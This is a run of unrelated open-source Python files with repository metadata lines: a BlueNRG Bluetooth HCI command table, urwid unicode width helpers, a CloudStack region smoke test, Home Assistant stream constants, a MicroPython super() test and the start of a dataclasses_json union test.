"dv_type": uctypes.UINT8 | 4,
"own_addr_type": uctypes.UINT8 | 5,
"var_len_data":
(uctypes.ARRAY | 6, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 6)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_START_OBSERVATION_PROC: [
"GAP_START_OBSERVATION_PROC",
{
"scan_interval": uctypes.UINT16 | 0,
"scan_window": uctypes.UINT16 | 2,
"scan_type": uctypes.UINT8 | 4,
"own_address_type": uctypes.UINT8 | 5,
"filter_duplicates": uctypes.UINT8 | 6
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GAP_GET_BONDED_DEVICES: [
"GAP_GET_BONDED_DEVICES",
None,
{
"status": uctypes.UINT8 | 0,
"num_addr": uctypes.UINT8 | 1,
"dev_list":
(uctypes.ARRAY | 2, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 2)
}
],
OCF_GAP_IS_DEVICE_BONDED: [
"GAP_IS_DEVICE_BONDED",
{
"peer_address_type": uctypes.UINT8 | 0,
"peer_address": (uctypes.ARRAY | 1, uctypes.UINT8 | 6)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_INIT: [
"GATT_INIT",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_ADD_SERV: [
"GATT_ADD_SERV",
None,
{
"status": uctypes.UINT8 | 0,
"handle": uctypes.UINT16 | 1
}
],
OCF_GATT_INCLUDE_SERV: [
"GATT_INCLUDE_SERV",
None,
{
"status": uctypes.UINT8 | 0,
"handle": uctypes.UINT16 | 1
}
],
OCF_GATT_ADD_CHAR: [
"GATT_ADD_CHAR",
None,
{
"status": uctypes.UINT8 | 0,
"handle": uctypes.UINT16 | 1
}
],
OCF_GATT_ADD_CHAR_DESC: [
"GATT_ADD_CHAR_DESC",
None,
{
"status": uctypes.UINT8 | 0,
"handle": uctypes.UINT16 | 1
}
],
OCF_GATT_UPD_CHAR_VAL: [
"GATT_UPD_CHAR_VAL",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_DEL_CHAR: [
"GATT_DEL_CHAR",
{
"service_handle": uctypes.UINT16 | 0,
"char_handle": uctypes.UINT16 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_DEL_SERV: [
"GATT_DEL_SERV",
{
"service_handle": uctypes.UINT16 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_DEL_INC_SERV: [
"GATT_DEL_INC_SERV",
{
"service_handle": uctypes.UINT16 | 0,
"inc_serv_handle": uctypes.UINT16 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_SET_EVT_MASK: [
"GATT_SET_EVT_MASK",
{
"evt_mask": uctypes.UINT32 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_EXCHANGE_CONFIG: [
"GATT_EXCHANGE_CONFIG",
{
"conn_handle": uctypes.UINT16 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_ATT_FIND_INFO_REQ: [
"ATT_FIND_INFO_REQ",
{
"conn_handle": uctypes.UINT16 | 0,
"start_handle": uctypes.UINT16 | 2,
"end_handle": uctypes.UINT16 | 4
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_ATT_FIND_BY_TYPE_VALUE_REQ: [
"ATT_FIND_BY_TYPE_VALUE_REQ",
{
"conn_handle": uctypes.UINT16 | 0,
"start_handle": uctypes.UINT16 | 2,
"end_handle": uctypes.UINT16 | 4,
"uuid": (uctypes.ARRAY | 6, uctypes.UINT8 | 2),
"attr_val_len": uctypes.UINT8 | 8,
"attr_val":
(uctypes.ARRAY | 9, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 9)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_ATT_READ_BY_TYPE_REQ: [
"ATT_READ_BY_TYPE_REQ",
{
"conn_handle": uctypes.UINT16 | 0,
"start_handle": uctypes.UINT16 | 2,
"end_handle": uctypes.UINT16 | 4,
"uuid_type": uctypes.UINT8 | 6,
"uuid": (uctypes.ARRAY | 7, uctypes.UINT8 | 16)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_ATT_READ_BY_GROUP_TYPE_REQ: [
"ATT_READ_BY_GROUP_TYPE_REQ",
{
"conn_handle": uctypes.UINT16 | 0,
"start_handle": uctypes.UINT16 | 2,
"end_handle": uctypes.UINT16 | 4,
"uuid_type": uctypes.UINT8 | 6,
"uuid": (uctypes.ARRAY | 7, uctypes.UINT8 | 16)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_ATT_PREPARE_WRITE_REQ: [
"ATT_PREPARE_WRITE_REQ",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"value_offset": uctypes.UINT16 | 4,
"attr_val_len": uctypes.UINT8 | 6,
"attr_val":
(uctypes.ARRAY | 7, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 7)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_ATT_EXECUTE_WRITE_REQ: [
"ATT_EXECUTE_WRITE_REQ",
{
"conn_handle": uctypes.UINT16 | 0,
"execute": uctypes.UINT8 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_DISC_ALL_PRIM_SERVICES: [
"GATT_DISC_ALL_PRIM_SERVICES",
{
"conn_handle": uctypes.UINT16 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_DISC_PRIM_SERVICE_BY_UUID: [
"GATT_DISC_PRIM_SERVICE_BY_UUID",
{
"conn_handle": uctypes.UINT16 | 0,
"uuid_type": uctypes.UINT8 | 2,
"uuid": (uctypes.ARRAY | 3, uctypes.UINT8 | 16)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_FIND_INCLUDED_SERVICES: [
"GATT_FIND_INCLUDED_SERVICES",
{
"conn_handle": uctypes.UINT16 | 0,
"start_handle": uctypes.UINT16 | 2,
"end_handle": uctypes.UINT16 | 4
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_DISC_ALL_CHARAC_OF_SERV: [
"GATT_DISC_ALL_CHARAC_OF_SERV",
{
"conn_handle": uctypes.UINT16 | 0,
"start_handle": uctypes.UINT16 | 2,
"end_handle": uctypes.UINT16 | 4
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_DISC_CHARAC_BY_UUID: [
"GATT_DISC_CHARAC_BY_UUID",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_DISC_ALL_CHARAC_DESCRIPTORS: [
"GATT_DISC_ALL_CHARAC_DESCRIPTORS",
{
"conn_handle": uctypes.UINT16 | 0,
"start_handle": uctypes.UINT16 | 2,
"end_handle": uctypes.UINT16 | 4
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_READ_CHARAC_VAL: [
"GATT_READ_CHARAC_VAL",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_READ_USING_CHARAC_UUID: [
"GATT_READ_USING_CHARAC_UUID",
{
"conn_handle": uctypes.UINT16 | 0,
"start_handle": uctypes.UINT16 | 2,
"end_handle": uctypes.UINT16 | 4,
"uuid_type": uctypes.UINT8 | 6,
"uuid": (uctypes.ARRAY | 7, uctypes.UINT8 | 16)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_READ_LONG_CHARAC_VAL: [
"GATT_READ_LONG_CHARAC_VAL",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"val_offset": uctypes.UINT16 | 4
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_READ_MULTIPLE_CHARAC_VAL: [
"GATT_READ_MULTIPLE_CHARAC_VAL",
{
"conn_handle": uctypes.UINT16 | 0,
"num_handles": uctypes.UINT8 | 2,
"set_of_handles":
(uctypes.ARRAY | 3, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 3)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_WRITE_CHAR_VALUE: [
"GATT_WRITE_CHAR_VALUE",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_WRITE_LONG_CHARAC_VAL: [
"GATT_WRITE_LONG_CHARAC_VAL",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"val_offset": uctypes.UINT16 | 4,
"val_len": uctypes.UINT8 | 6,
"attr_val":
(uctypes.ARRAY | 7, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 7)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_WRITE_CHARAC_RELIABLE: [
"GATT_WRITE_CHARAC_RELIABLE",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"val_offset": uctypes.UINT16 | 4,
"val_len": uctypes.UINT8 | 6,
"attr_val":
(uctypes.ARRAY | 7, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 7)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_WRITE_LONG_CHARAC_DESC: [
"GATT_WRITE_LONG_CHARAC_DESC",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"val_offset": uctypes.UINT16 | 4,
"val_len": uctypes.UINT8 | 6,
"attr_val":
(uctypes.ARRAY | 7, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 7)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_READ_LONG_CHARAC_DESC: [
"GATT_READ_LONG_CHARAC_DESC",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"val_offset": uctypes.UINT16 | 4
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_WRITE_CHAR_DESC: [
"GATT_WRITE_CHAR_DESC",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_READ_CHAR_DESC: [
"GATT_READ_CHAR_DESC",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_WRITE_WITHOUT_RESPONSE: [
"GATT_WRITE_WITHOUT_RESPONSE",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"val_len": uctypes.UINT8 | 4,
"attr_val":
(uctypes.ARRAY | 5, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 5)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_SIGNED_WRITE_WITHOUT_RESPONSE: [
"GATT_SIGNED_WRITE_WITHOUT_RESPONSE",
{
"conn_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"val_len": uctypes.UINT8 | 4,
"attr_val":
(uctypes.ARRAY | 5, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 5)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_CONFIRM_INDICATION: [
"GATT_CONFIRM_INDICATION",
{
"conn_handle": uctypes.UINT16 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_WRITE_RESPONSE: [
"GATT_WRITE_RESPONSE",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_ALLOW_READ: [
"GATT_ALLOW_READ",
{
"conn_handle": uctypes.UINT16 | 0
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_SET_SECURITY_PERMISSION: [
"GATT_SET_SECURITY_PERMISSION",
{
"service_handle": uctypes.UINT16 | 0,
"attr_handle": uctypes.UINT16 | 2,
"security_permission": uctypes.UINT8 | 4
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_SET_DESC_VAL: [
"GATT_SET_DESC_VAL",
None,
{
"status": uctypes.UINT8 | 0
}
],
OCF_GATT_READ_HANDLE_VALUE: [
"GATT_READ_HANDLE_VALUE",
{
"attr_handle": uctypes.UINT16 | 0
},
{
"status": uctypes.UINT8 | 0,
"value_len": uctypes.UINT16 | 1,
"value":
(uctypes.ARRAY | 3, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 3)
}
],
OCF_GATT_READ_HANDLE_VALUE_OFFSET: [
"GATT_READ_HANDLE_VALUE_OFFSET",
{
"attr_handle": uctypes.UINT16 | 0,
"offset": uctypes.UINT8 | 2
},
{
"status": uctypes.UINT8 | 0,
"value_len": uctypes.UINT16 | 1,
"value":
(uctypes.ARRAY | 3, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 3)
}
],
OCF_GATT_UPD_CHAR_VAL_EXT: [
"GATT_UPD_CHAR_VAL_EXT",
{
"service_handle": uctypes.UINT16 | 0,
"char_handle": uctypes.UINT16 | 2,
"update_type": uctypes.UINT8 | 4,
"char_length": uctypes.UINT16 | 5,
"value_offset": uctypes.UINT16 | 7,
"value_length": uctypes.UINT8 | 9,
"value":
(uctypes.ARRAY | 10, uctypes.UINT8 | HCI_MAX_PAYLOAD_SIZE - 10)
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_L2CAP_CONN_PARAM_UPDATE_REQ: [
"L2CAP_CONN_PARAM_UPDATE_REQ",
{
"conn_handle": uctypes.UINT16 | 0,
"interval_min": uctypes.UINT16 | 2,
"interval_max": uctypes.UINT16 | 4,
"slave_latency": uctypes.UINT16 | 6,
"timeout_multiplier": uctypes.UINT16 | 8
},
{
"status": uctypes.UINT8 | 0
}
],
OCF_L2CAP_CONN_PARAM_UPDATE_RESP: [
"L2CAP_CONN_PARAM_UPDATE_RESP",
{
"IDB05A1": {
"conn_handle": uctypes.UINT16 | 0,
"interval_min": uctypes.UINT16 | 2,
"interval_max": uctypes.UINT16 | 4,
"slave_latency": uctypes.UINT16 | 6,
"timeout_multiplier": uctypes.UINT16 | 8,
"min_ce_length": uctypes.UINT16 | 10,
"max_ce_length": uctypes.UINT16 | 12,
"id": uctypes.UINT8 | 14,
"accept": uctypes.UINT8 | 15
},
"IDB04A1": {
"conn_handle": uctypes.UINT16 | 0,
"interval_min": uctypes.UINT16 | 2,
"interval_max": uctypes.UINT16 | 4,
"slave_latency": uctypes.UINT16 | 6,
"timeout_multiplier": uctypes.UINT16 | 8,
"id": uctypes.UINT8 | 10,
"accept": uctypes.UINT8 | 11
}
},
{
"status": uctypes.UINT8 | 0
}
]
}
]
| dmazzella/uble | bluetooth_low_energy/protocols/hci/vendor_specifics/st_microelectronics/bluenrg_ms/cmd.py | Python | mit | 39,745 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Urwid unicode character processing tables
# Copyright (C) 2004-2011 Ian Ward
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Urwid web site: http://excess.org/urwid/
import bisect
import re

from urwid.compat import bytes, B, ord2
# Matches text consisting only of printable ASCII (space through tilde);
# used by calc_width() to take a fast constant-width path.
SAFE_ASCII_RE = re.compile(u"^[ -~]*$")
# Same test for byte strings (B() is the urwid.compat byte-literal helper).
SAFE_ASCII_BYTES_RE = re.compile(B("^[ -~]*$"))
# How byte strings are interpreted: 'utf8', 'narrow' or 'wide';
# None until set_byte_encoding() is called.
_byte_encoding = None
# GENERATED DATA
# generated from
# http://www.unicode.org/Public/4.0-Update/EastAsianWidth-4.0.0.txt
# Each entry is (last_ordinal, width): every ordinal greater than the
# previous entry's last_ordinal and up to (and including) this entry's
# last_ordinal occupies `width` screen columns.  Consumed by get_width()
# and produced by process_east_asian_width() below.
widths = [
    (126, 1),
    (159, 0),
    (687, 1),
    (710, 0),
    (711, 1),
    (727, 0),
    (733, 1),
    (879, 0),
    (1154, 1),
    (1161, 0),
    (4347, 1),
    (4447, 2),
    (7467, 1),
    (7521, 0),
    (8369, 1),
    (8426, 0),
    (9000, 1),
    (9002, 2),
    (11021, 1),
    (12350, 2),
    (12351, 1),
    (12438, 2),
    (12442, 0),
    (19893, 2),
    (19967, 1),
    (55203, 2),
    (63743, 1),
    (64106, 2),
    (65039, 1),
    (65059, 0),
    (65131, 2),
    (65279, 1),
    (65376, 2),
    (65500, 1),
    (65510, 2),
    (120831, 1),
    (262141, 2),
    (1114109, 1),
]
# ACCESSOR FUNCTIONS
def get_width( o ):
    """Return the screen column width for unicode ordinal o.

    Widths come from the East Asian Width table above: 0 for combining
    and control characters, 2 for wide characters, 1 otherwise.
    """
    if o == 0xe or o == 0xf:
        # shift-out / shift-in control characters take no screen space
        return 0
    # widths is sorted by last-ordinal, so use a binary search instead of
    # the original linear scan -- this is called once per character.
    # (o,) sorts before (o, width), so bisect_left returns the first
    # index with widths[index][0] >= o, matching the old linear scan.
    index = bisect.bisect_left(widths, (o,))
    if index < len(widths):
        return widths[index][1]
    # beyond the table: default to a single column
    return 1
def decode_one( text, pos ):
    """
    Return (ordinal at pos, next position) for UTF-8 encoded text.

    On a malformed or truncated sequence return (ord("?"), pos+1) so the
    caller can show a replacement character and continue.
    """
    assert isinstance(text, bytes), text
    b1 = ord2(text[pos])
    if not b1 & 0x80:
        # plain 7-bit ASCII byte
        return b1, pos+1
    error = ord("?"), pos+1
    lt = len(text)
    lt = lt-pos
    if lt < 2:
        return error
    if b1 & 0xe0 == 0xc0:
        # two-byte sequence: 110xxxxx 10xxxxxx
        b2 = ord2(text[pos+1])
        if b2 & 0xc0 != 0x80:
            return error
        o = ((b1&0x1f)<<6)|(b2&0x3f)
        if o < 0x80:
            # overlong encoding is invalid
            return error
        return o, pos+2
    if lt < 3:
        return error
    if b1 & 0xf0 == 0xe0:
        # three-byte sequence: 1110xxxx 10xxxxxx 10xxxxxx
        b2 = ord2(text[pos+1])
        if b2 & 0xc0 != 0x80:
            return error
        b3 = ord2(text[pos+2])
        if b3 & 0xc0 != 0x80:
            return error
        o = ((b1&0x0f)<<12)|((b2&0x3f)<<6)|(b3&0x3f)
        if o < 0x800:
            return error
        return o, pos+3
    if lt < 4:
        return error
    if b1 & 0xf8 == 0xf0:
        # four-byte sequence: 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
        b2 = ord2(text[pos+1])
        if b2 & 0xc0 != 0x80:
            return error
        b3 = ord2(text[pos+2])
        if b3 & 0xc0 != 0x80:
            return error
        # bug fix: the fourth byte is at pos+3 -- the original re-read
        # pos+2, decoding every 4-byte character to the wrong ordinal
        b4 = ord2(text[pos+3])
        if b4 & 0xc0 != 0x80:
            return error
        o = ((b1&0x07)<<18)|((b2&0x3f)<<12)|((b3&0x3f)<<6)|(b4&0x3f)
        if o < 0x10000:
            return error
        return o, pos+4
    return error
def decode_one_uni(text, i):
    """
    decode_one equivalent for unicode strings: the ordinal is simply the
    character at position i, and the next position is always i + 1.
    """
    ordinal = ord(text[i])
    return ordinal, i + 1
def decode_one_right(text, pos):
    """
    Return (ordinal at pos, next position) for UTF-8 encoded text.
    pos is assumed to be on the trailing byte of a utf-8 sequence.

    Scans backwards for the lead byte of the sequence; gives up with
    (ord("?"), pos-1) once more than the 4-byte maximum length of a
    UTF-8 sequence has been scanned, or the start of text is reached.
    """
    assert isinstance(text, bytes), text
    error = ord("?"), pos-1
    p = pos
    while p >= 0:
        if ord2(text[p])&0xc0 != 0x80:
            o, next = decode_one( text, p )
            return o, p-1
        p -= 1
        # bug fix: the original tested `p == p-4`, which is always False,
        # so malformed input was scanned all the way back to position 0
        if p == pos-4:
            return error
    # bug fix: only continuation bytes down to the start of text --
    # return the error tuple instead of implicitly returning None
    return error
def set_byte_encoding(enc):
    # Select how byte strings are interpreted by the functions in this
    # module; must be one of 'utf8', 'narrow' or 'wide'.
    assert enc in ('utf8', 'narrow', 'wide')
    global _byte_encoding
    _byte_encoding = enc
def get_byte_encoding():
    # Current byte-string mode: 'utf8', 'narrow', 'wide', or None if
    # set_byte_encoding() has not been called yet.
    return _byte_encoding
def calc_text_pos(text, start_offs, end_offs, pref_col):
    """
    Calculate the closest position to the screen column pref_col in text
    where start_offs is the offset into text assumed to be screen column 0
    and end_offs is the end of the range to search.

    text may be unicode or a byte string in the target _byte_encoding

    Returns (position, actual_col).
    """
    assert start_offs <= end_offs, repr((start_offs, end_offs))
    utfs = isinstance(text, bytes) and _byte_encoding == "utf8"
    unis = not isinstance(text, bytes)
    if unis or utfs:
        # variable-width path: walk character by character, accumulating
        # screen columns until the next character would pass pref_col
        decode = [decode_one, decode_one_uni][unis]  # bool indexes 0/1
        i = start_offs
        sc = 0
        n = 1 # number to advance by
        while i < end_offs:
            o, n = decode(text, i)
            w = get_width(o)
            if w+sc > pref_col:
                return i, sc
            i = n
            sc += w
        return i, sc
    assert type(text) == bytes, repr(text)
    # "wide" and "narrow"
    # one byte == one screen column, so the target is a direct offset
    i = start_offs+pref_col
    if i >= end_offs:
        return end_offs, end_offs-start_offs
    if _byte_encoding == "wide":
        # don't land on the 2nd half of a double-byte character
        if within_double_byte(text, start_offs, i) == 2:
            i -= 1
    return i, i-start_offs
def calc_width(text, start_offs, end_offs):
    """
    Return the screen column width of text between start_offs and end_offs.

    text may be unicode or a byte string in the target _byte_encoding

    Some characters are wide (take two columns) and others affect the
    previous character (take zero columns). Use the widths table above
    to calculate the screen column width of text[start_offs:end_offs]
    """
    assert start_offs <= end_offs, repr((start_offs, end_offs))
    utfs = isinstance(text, bytes) and _byte_encoding == "utf8"
    unis = not isinstance(text, bytes)
    if (unis and not SAFE_ASCII_RE.match(text)
            ) or (utfs and not SAFE_ASCII_BYTES_RE.match(text)):
        # slow path: decode each character and sum its column width
        decode = [decode_one, decode_one_uni][unis]
        screen_cols = 0
        pos = start_offs
        while pos < end_offs:
            ordinal, pos = decode(text, pos)
            screen_cols += get_width(ordinal)
        return screen_cols
    # "wide", "narrow" or all printable ASCII, just return the character count
    return end_offs - start_offs
def is_wide_char(text, offs):
    """
    Test if the character at offs within text is wide.

    text may be unicode or a byte string in the target _byte_encoding
    """
    if isinstance(text, unicode):  # Python 2 'unicode' type
        o = ord(text[offs])
        return get_width(o) == 2
    assert isinstance(text, bytes)
    if _byte_encoding == "utf8":
        o, n = decode_one(text, offs)
        return get_width(o) == 2
    if _byte_encoding == "wide":
        # 1 means offs is the first half of a double-byte character
        return within_double_byte(text, offs, offs) == 1
    return False
def move_prev_char(text, start_offs, end_offs):
    """
    Return the position of the character before end_offs.
    """
    assert start_offs < end_offs
    if isinstance(text, unicode):  # Python 2 'unicode' type
        return end_offs-1
    assert isinstance(text, bytes)
    if _byte_encoding == "utf8":
        # skip backwards over UTF-8 continuation bytes (10xxxxxx)
        o = end_offs-1
        while ord2(text[o])&0xc0 == 0x80:
            o -= 1
        return o
    if _byte_encoding == "wide" and within_double_byte(text,
            start_offs, end_offs-1) == 2:
        # previous character is double-byte: step back over both halves
        return end_offs-2
    return end_offs-1
def move_next_char(text, start_offs, end_offs):
    """
    Return the position of the character after start_offs.
    """
    assert start_offs < end_offs
    if isinstance(text, unicode):  # Python 2 'unicode' type
        return start_offs+1
    assert isinstance(text, bytes)
    if _byte_encoding == "utf8":
        # skip forwards over UTF-8 continuation bytes (10xxxxxx)
        o = start_offs+1
        while o<end_offs and ord2(text[o])&0xc0 == 0x80:
            o += 1
        return o
    if _byte_encoding == "wide" and within_double_byte(text,
            start_offs, start_offs) == 1:
        # current character is double-byte: step over both halves
        return start_offs +2
    return start_offs+1
def within_double_byte(text, line_start, pos):
    """Return whether pos is within a double-byte encoded character.

    text -- byte string in question
    line_start -- offset of beginning of line (< pos)
    pos -- offset in question

    Return values:
    0 -- not within dbe char, or double_byte_encoding == False
    1 -- pos is on the 1st half of a dbe char
    2 -- pos is on the 2nd half of a dbe char
    """
    assert isinstance(text, bytes)
    v = ord2(text[pos])

    if v >= 0x40 and v < 0x7f:
        # might be second half of big5, uhc or gbk encoding
        if pos == line_start: return 0

        if ord2(text[pos-1]) >= 0x81:
            # recurse: this byte is a 2nd half only if the previous byte
            # is itself the 1st half of a double-byte character
            if within_double_byte(text, line_start, pos-1) == 1:
                return 2
        return 0

    if v < 0x80: return 0

    # high byte: count the run of consecutive high bytes back to the line
    # start -- an odd run length means pos is a 1st half, even a 2nd half
    i = pos -1
    while i >= line_start:
        if ord2(text[i]) < 0x80:
            break
        i -= 1

    if (pos - i) & 1:
        return 1
    return 2
# TABLE GENERATION CODE
def process_east_asian_width():
    """Read an EastAsianWidth.txt file from stdin and print the `widths`
    table used above.

    Ordinals classed W (wide) or F (fullwidth) get width 2; COMBINING,
    MODIFIER and <control> characters get width 0; everything else gets
    width 1.  Consecutive ordinals with the same width are collapsed
    into (last_ordinal, width) pairs.

    Fix: use print() calls (valid on both Python 2 and 3) instead of the
    Python-2-only print statements, matching the module's urwid.compat
    based 2/3 support; also avoid shadowing the builtin `hex`.
    """
    import sys
    out = []
    last = None
    for line in sys.stdin.readlines():
        if line[:1] == "#":
            continue
        line = line.strip()
        hex_range, rest = line.split(";", 1)
        width_class, rest = rest.split(" # ", 1)
        first_word = rest.split(" ", 1)[0]
        if "." in hex_range:
            # "XXXX..YYYY" range: only the last ordinal matters here
            hex_range = hex_range.split("..")[1]
        num = int(hex_range, 16)

        if first_word in ("COMBINING", "MODIFIER", "<control>"):
            width = 0
        elif width_class in ("W", "F"):
            width = 2
        else:
            width = 1

        if last is None:
            out.append((0, width))
            last = width

        if last == width:
            # extend the current run
            out[-1] = (num, width)
        else:
            out.append((num, width))
            last = width

    print("widths = [")
    for entry in out[1:]:  # treat control characters same as ascii
        print("\t%r," % (entry,))
    print("]")
| bk2204/urwid | urwid/old_str_util.py | Python | lgpl-2.1 | 10,013 |
from marvin.cloudstackAPI import *
from marvin.cloudstackTestCase import *
from marvin.lib.base import *
from marvin.lib.common import *
from marvin.lib.utils import *
from nose.plugins.attrib import attr
class TestRegions(cloudstackTestCase):
    """Smoke test for Regions: create a region, verify it through the
    list API, and remove it again during class teardown.
    """

    @classmethod
    def setUpClass(cls):
        # One shared API client, test configuration, domain and cleanup
        # list for all tests in this class.
        test_client = super(TestRegions, cls).getClsTestClient()
        cls.apiclient = test_client.getApiClient()
        cls.services = test_client.getParsedTestDataConfig()
        cls.domain = get_domain(cls.apiclient)
        cls.cleanup = []

    @attr(tags=["basic", "advanced"], required_hardware="true")
    def test_createRegion(self):
        """ Test for create region
        """
        region_data = self.services["region"]
        created = Region.create(self.apiclient, region_data)

        listed = Region.list(self.apiclient, id=region_data["regionid"])
        self.assertEqual(
            isinstance(listed, list),
            True,
            "Check for list Region response"
        )

        found = listed[0]
        self.assertEqual(
            str(found.id),
            region_data["regionid"],
            "listRegion response does not match with region Id created"
        )
        self.assertEqual(
            found.name,
            region_data["regionname"],
            "listRegion response does not match with region name created"
        )
        self.assertEqual(
            found.endpoint,
            region_data["regionendpoint"],
            "listRegion response does not match with region endpoint created"
        )
        self.cleanup.append(created)
        return

    @classmethod
    def tearDownClass(cls):
        try:
            # Clean up
            cleanup_resources(cls.apiclient, cls.cleanup)
            remaining = Region.list(cls.apiclient, id=cls.services["region"]["regionid"])
            assert remaining is None, "Region deletion fails"
        except Exception as e:
            raise Exception("Warning: Region cleanup/delete fails with : %s" % e)
| remibergsma/cosmic | cosmic-core/test/integration/smoke/test_regions.py | Python | apache-2.0 | 2,270 |
"""Constants for Stream component."""
DOMAIN = 'stream'
# String keys used alongside DOMAIN (presumably for component-shared data;
# confirm against the stream component code).
ATTR_ENDPOINTS = 'endpoints'
ATTR_STREAMS = 'streams'
ATTR_KEEPALIVE = 'keepalive'
# Supported output container formats and their HTTP content types.
OUTPUT_FORMATS = ['hls']
FORMAT_CONTENT_TYPE = {
    'hls': 'application/vnd.apple.mpegurl'
}
# 44100 is the standard CD-quality audio sample rate.
AUDIO_SAMPLE_RATE = 44100
| nugget/home-assistant | homeassistant/components/stream/const.py | Python | apache-2.0 | 263 |
# test super with multiple inheritance
class A:
    def foo(self):
        # base implementation reached first via C's MRO (C -> A -> B)
        print('A.foo')
class B:
    def foo(self):
        # not reached from C.foo: A precedes B in C's MRO
        print('B.foo')
class C(A, B):
    def foo(self):
        print('C.foo')
        # zero-argument super() follows the MRO (A before B), so this
        # dispatches to A.foo
        super().foo()
C().foo()
| infinnovation/micropython | tests/basics/class_super_multinherit.py | Python | mit | 234 |
import pytest
from typing import *
from dataclasses import dataclass
from dataclasses_json import dataclass_json
from marshmallow import ValidationError
# == Common use cases ==
@dataclass_json
@dataclass
class C1:
    # Union of two JSON primitives: serialized without a "__type" tag
    # (see the `params` table below).
    f1: Union[int, str]
@dataclass_json
@dataclass
class C2:
    # Scalar or a str -> float mapping.
    f1: Union[int, Dict[str, float]]
@dataclass_json
@dataclass
class C3:
    # Scalar or a list of floats.
    f1: Union[int, List[float]]
# == Use cases with nested dataclasses ==
@dataclass_json
@dataclass
class Aux1:
    # Nested dataclass with an int field; inside a Union it is told apart
    # from Aux2 by the "__type" discriminator (see `params` below).
    f1: int
@dataclass_json
@dataclass
class Aux2:
    # Nested dataclass with a str field; counterpart to Aux1 above.
    f1: str
@dataclass_json
@dataclass
class C4:
    # Union of two dataclasses: requires the "__type" discriminator.
    f1: Union[Aux1, Aux2]
@dataclass_json
@dataclass
class C5:
    # Union of two dataclasses that also allows null.
    f1: Union[Aux1, Aux2, None]
@dataclass_json
@dataclass
class C6:
    f1: Union[Aux1, None]  # The same as Optional[Aux1]
@dataclass_json
@dataclass
class C7:
